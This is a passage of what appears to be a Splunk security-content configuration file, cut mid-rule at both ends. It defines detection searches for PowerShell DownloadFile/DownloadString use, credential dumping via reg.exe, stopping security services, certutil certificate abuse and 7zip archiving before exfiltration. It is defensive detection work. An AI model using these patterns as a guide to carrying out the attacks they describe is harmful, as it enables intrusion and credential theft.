`Consent Admin` to perform an operation that requires elevation without consent or credentials. We also found this in some attacker to gain privilege escalation to the compromise machine. action.notable.param.rule_title = Allow Operation with Consent Admin action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\Microsoft\\Windows\\CurrentVersion\\Policies\\System*" Registry.registry_value_name = ConsentPromptBehaviorAdmin Registry.registry_value_data = "0x00000000") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_operation_with_consent_admin_filter` [ESCU - Anomalous usage of 7zip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies a 7z.exe spawned from `Rundll32.exe` or `Dllhost.exe`. It is assumed that the adversary has brought in `7z.exe` and `7z.dll`. It has been observed where an adversary will rename `7z.exe`. Additional coverage may be required to identify the behavior of renamed instances of `7z.exe`. During triage, identify the source of injection into `Rundll32.exe` or `Dllhost.exe`. Capture any files written to disk and analyze as needed. Review parallel processes for additional behaviors. Typically, archiving files will result in exfiltration. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies a 7z.exe spawned from `Rundll32.exe` or `Dllhost.exe`. It is assumed that the adversary has brought in `7z.exe` and `7z.dll`. It has been observed where an adversary will rename `7z.exe`. Additional coverage may be required to identify the behavior of renamed instances of `7z.exe`. During triage, identify the source of injection into `Rundll32.exe` or `Dllhost.exe`. Capture any files written to disk and analyze as needed. Review parallel processes for additional behaviors. Typically, archiving files will result in exfiltration. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as this behavior is not normal for `rundll32.exe` or `dllhost.exe` to spawn and run 7zip. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Anomalous usage of 7zip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["NOBELIUM Group", "BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$. This behavior is indicative of suspicious loading of 7zip. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Anomalous usage of 7zip - Rule action.correlationsearch.annotations = {"analytic_story": ["NOBELIUM Group", "BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("rundll32.exe", "dllhost.exe") Processes.process_name=*7z* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `anomalous_usage_of_7zip_filter` [ESCU - Any Powershell DownloadFile - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of PowerShell downloading a file using `DownloadFile` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059", "T1059.001", "T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of PowerShell downloading a file using `DownloadFile` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present and filtering will need to occur by parent process or command line argument. It may be required to modify this query to an EDR product for more granular coverage. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Any Powershell DownloadFile - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkCrystal RAT", "Ingress Tool Transfer", "Hermetic Wiper", "Malicious PowerShell", "Data Destruction", "Log4Shell CVE-2021-44228", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$. This behavior identifies the use of DownloadFile within PowerShell. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Any Powershell DownloadFile - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkCrystal RAT", "Ingress Tool Transfer", "Hermetic Wiper", "Malicious PowerShell", "Data Destruction", "Log4Shell CVE-2021-44228", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-44228"], "impact": 80, "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059", "T1059.001", "T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of PowerShell downloading a file using `DownloadFile` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. action.notable.param.rule_title = Any Powershell DownloadFile action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*DownloadFile* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadfile_filter` [ESCU - Any Powershell DownloadString - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of PowerShell downloading a file using `DownloadString` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059", "T1059.001", "T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of PowerShell downloading a file using `DownloadString` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present and filtering will need to occur by parent process or command line argument. It may be required to modify this query to an EDR product for more granular coverage. action.escu.creation_date = 2023-04-05 action.escu.modification_date = 2023-04-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Any Powershell DownloadString - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Winter Vivern", "Ingress Tool Transfer", "Hermetic Wiper", "Malicious PowerShell", "HAFNIUM Group", "Data Destruction", "IcedID", "SysAid On-Prem Software CVE-2023-47246 Vulnerability", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$. This behavior identifies the use of DownloadString within PowerShell. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Any Powershell DownloadString - Rule action.correlationsearch.annotations = {"analytic_story": ["Winter Vivern", "Ingress Tool Transfer", "Hermetic Wiper", "Malicious PowerShell", "HAFNIUM Group", "Data Destruction", "IcedID", "SysAid On-Prem Software CVE-2023-47246 Vulnerability", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059", "T1059.001", "T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of PowerShell downloading a file using `DownloadString` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. action.notable.param.rule_title = Any Powershell DownloadString action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*.DownloadString* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadstring_filter` [ESCU - Attacker Tools On Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the use of tools that are commonly exploited by cybercriminals since these tools are usually associated with malicious activities such as unauthorized access, network scanning, or data exfiltration and pose a significant threat to an organization's security infrastructure. It also provides enhanced visibility into potential security threats and helps to proactively detect and respond to mitigate the risks associated with cybercriminal activities. This detection is made by examining the process activity on the host, specifically focusing on processes that are known to be associated with attacker tool names. This detection is important because it acts as an early warning system for potential security incidents that allows you to respond to security incidents promptly. False positives might occur due to legitimate administrative activities that can resemble malicious actions. You must develop a comprehensive understanding of typical endpoint activities and behaviors within the organization to accurately interpret and respond to the alerts generated by this analytic. This ensures a proper balance between precision and minimizing false positives. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Reconnaissance"], "mitre_attack": ["T1036.005", "T1036", "T1003", "T1595"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the use of tools that are commonly exploited by cybercriminals since these tools are usually associated with malicious activities such as unauthorized access, network scanning, or data exfiltration and pose a significant threat to an organization's security infrastructure. It also provides enhanced visibility into potential security threats and helps to proactively detect and respond to mitigate the risks associated with cybercriminal activities. This detection is made by examining the process activity on the host, specifically focusing on processes that are known to be associated with attacker tool names. This detection is important because it acts as an early warning system for potential security incidents that allows you to respond to security incidents promptly. False positives might occur due to legitimate administrative activities that can resemble malicious actions. You must develop a comprehensive understanding of typical endpoint activities and behaviors within the organization to accurately interpret and respond to the alerts generated by this analytic. This ensures a proper balance between precision and minimizing false positives. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some administrator activity can be potentially triggered, please add those users to the filter macro. action.escu.creation_date = 2024-01-01 action.escu.modification_date = 2024-01-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Attacker Tools On Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Monitor for Unauthorized Software", "XMRig", "SamSam Ransomware", "Unusual Processes", "CISA AA22-264A"] action.risk = 1 action.risk.param._risk_message = An attacker tool $process_name$,listed in attacker_tools.csv is executed on host $dest$ by User $user$. This process $process_name$ is known to do- $description$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Attacker Tools On Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Monitor for Unauthorized Software", "XMRig", "SamSam Ransomware", "Unusual Processes", "CISA AA22-264A"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Reconnaissance"], "mitre_attack": ["T1036.005", "T1036", "T1003", "T1595"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the use of tools that are commonly exploited by cybercriminals since these tools are usually associated with malicious activities such as unauthorized access, network scanning, or data exfiltration and pose a significant threat to an organization's security infrastructure. It also provides enhanced visibility into potential security threats and helps to proactively detect and respond to mitigate the risks associated with cybercriminal activities. This detection is made by examining the process activity on the host, specifically focusing on processes that are known to be associated with attacker tool names. This detection is important because it acts as an early warning system for potential security incidents that allows you to respond to security incidents promptly. False positives might occur due to legitimate administrative activities that can resemble malicious actions. You must develop a comprehensive understanding of typical endpoint activities and behaviors within the organization to accurately interpret and respond to the alerts generated by this analytic. This ensures a proper balance between precision and minimizing false positives. action.notable.param.rule_title = Attacker Tools On Endpoint action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process) as process values(Processes.parent_process) as parent_process from datamodel=Endpoint.Processes where Processes.dest!=unknown Processes.user!=unknown by Processes.dest Processes.user Processes.process_name Processes.process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | lookup attacker_tools attacker_tool_names AS process_name OUTPUT description | search description !=false| `attacker_tools_on_endpoint_filter` [ESCU - Attempt To Add Certificate To Untrusted Store - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects whether a process is attempting to add a certificate to the untrusted certificate store, which might result in security tools being disabled. The detection is made by focusing on process activities and command-line arguments that are related to the 'certutil -addstore' command. This detection is important because it helps to identify attackers who might add a certificate to the untrusted certificate store to disable security tools and gain unauthorized access to a system. False positives might occur since legitimate reasons might exist for a process to add a certificate to the untrusted certificate store, such as system administration tasks. Next steps include conducting an extensive triage and investigation prior to taking any action. Additionally, you must understand the importance of trust and its subversion in system security. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1553.004", "T1553"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects whether a process is attempting to add a certificate to the untrusted certificate store, which might result in security tools being disabled. The detection is made by focusing on process activities and command-line arguments that are related to the 'certutil -addstore' command. This detection is important because it helps to identify attackers who might add a certificate to the untrusted certificate store to disable security tools and gain unauthorized access to a system. False positives might occur since legitimate reasons might exist for a process to add a certificate to the untrusted certificate store, such as system administration tasks. Next steps include conducting an extensive triage and investigation prior to taking any action. Additionally, you must understand the importance of trust and its subversion in system security. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = There may be legitimate reasons for administrators to add a certificate to the untrusted certificate store. In such cases, this will typically be done on a large number of systems. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Attempt To Add Certificate To Untrusted Store - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Disabling Security Tools"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified attempting to add a certificate to the store on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Attempt To Add Certificate To Untrusted Store - Rule action.correlationsearch.annotations = {"analytic_story": ["Disabling Security Tools"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1553.004", "T1553"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects whether a process is attempting to add a certificate to the untrusted certificate store, which might result in security tools being disabled. The detection is made by focusing on process activities and command-line arguments that are related to the 'certutil -addstore' command. This detection is important because it helps to identify attackers who might add a certificate to the untrusted certificate store to disable security tools and gain unauthorized access to a system. False positives might occur since legitimate reasons might exist for a process to add a certificate to the untrusted certificate store, such as system administration tasks. Next steps include conducting an extensive triage and investigation prior to taking any action. Additionally, you must understand the importance of trust and its subversion in system security. action.notable.param.rule_title = Attempt To Add Certificate To Untrusted Store action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*-addstore*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `attempt_to_add_certificate_to_untrusted_store_filter` [ESCU - Attempt To Stop Security Service - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects attempts to stop security-related services on the endpoint and helps to mitigate potential threats earlier, thereby minimizing the impact on the organization's security. The detection is made by using a Splunk query that searches for processes that involve the "sc.exe" command and include the phrase "stop" in their command. The query collects information such as the process name, process ID, parent process, user, destination, and timestamps. The detection is important because attempts to stop security-related services can indicate malicious activity or an attacker's attempt to disable security measures. This can impact the organization's security posture and can lead to the compromise of the endpoint and potentially the entire network. Disabling security services can allow attackers to gain unauthorized access, exfiltrate sensitive data, or launch further attacks, such as malware installation or privilege escalation. False positives might occur since there might be legitimate reasons for stopping these services in certain situations. Therefore, you must exercise caution and consider the context of the activity before taking any action. Next steps include reviewing the identified process and its associated details. You must also investigate any on-disk artifacts related to the process and review concurrent processes to determine the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects attempts to stop security-related services on the endpoint and helps to mitigate potential threats earlier, thereby minimizing the impact on the organization's security. The detection is made by using a Splunk query that searches for processes that involve the "sc.exe" command and include the phrase "stop" in their command. The query collects information such as the process name, process ID, parent process, user, destination, and timestamps. The detection is important because attempts to stop security-related services can indicate malicious activity or an attacker's attempt to disable security measures. This can impact the organization's security posture and can lead to the compromise of the endpoint and potentially the entire network. Disabling security services can allow attackers to gain unauthorized access, exfiltrate sensitive data, or launch further attacks, such as malware installation or privilege escalation. False positives might occur since there might be legitimate reasons for stopping these services in certain situations. Therefore, you must exercise caution and consider the context of the activity before taking any action. Next steps include reviewing the identified process and its associated details. You must also investigate any on-disk artifacts related to the process and review concurrent processes to determine the source of the attack. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified. Attempts to disable security-related services should be identified and understood. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Attempt To Stop Security Service - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["WhisperGate", "Graceful Wipe Out Attack", "Disabling Security Tools", "Data Destruction", "Azorult", "Trickbot"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified attempting to disable security services on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 20}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 20}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 20}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Attempt To Stop Security Service - Rule action.correlationsearch.annotations = {"analytic_story": ["WhisperGate", "Graceful Wipe Out Attack", "Disabling Security Tools", "Data Destruction", "Azorult", "Trickbot"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects attempts to stop security-related services on the endpoint and helps to mitigate potential threats earlier, thereby minimizing the impact on the organization's security. The detection is made by using a Splunk query that searches for processes that involve the "sc.exe" command and include the phrase "stop" in their command. The query collects information such as the process name, process ID, parent process, user, destination, and timestamps. The detection is important because attempts to stop security-related services can indicate malicious activity or an attacker's attempt to disable security measures. This can impact the organization's security posture and can lead to the compromise of the endpoint and potentially the entire network. Disabling security services can allow attackers to gain unauthorized access, exfiltrate sensitive data, or launch further attacks, such as malware installation or privilege escalation. False positives might occur since there might be legitimate reasons for stopping these services in certain situations. Therefore, you must exercise caution and consider the context of the activity before taking any action. Next steps include reviewing the identified process and its associated details. You must also investigate any on-disk artifacts related to the process and review concurrent processes to determine the source of the attack. action.notable.param.rule_title = Attempt To Stop Security Service action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` OR Processes.process_name = sc.exe Processes.process="* stop *" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |lookup security_services_lookup service as process OUTPUTNEW category, description | search category=security | `attempt_to_stop_security_service_filter` [ESCU - Attempted Credential Dump From Registry via Reg exe - Rule] action.escu = 0 action.escu.enabled = 1 description = Monitor for execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Monitor for execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Attempted Credential Dump From Registry via Reg exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Industroyer2", "Windows Registry Abuse", "Credential Dumping", "CISA AA23-347A", "DarkSide Ransomware", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to export the registry keys. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m 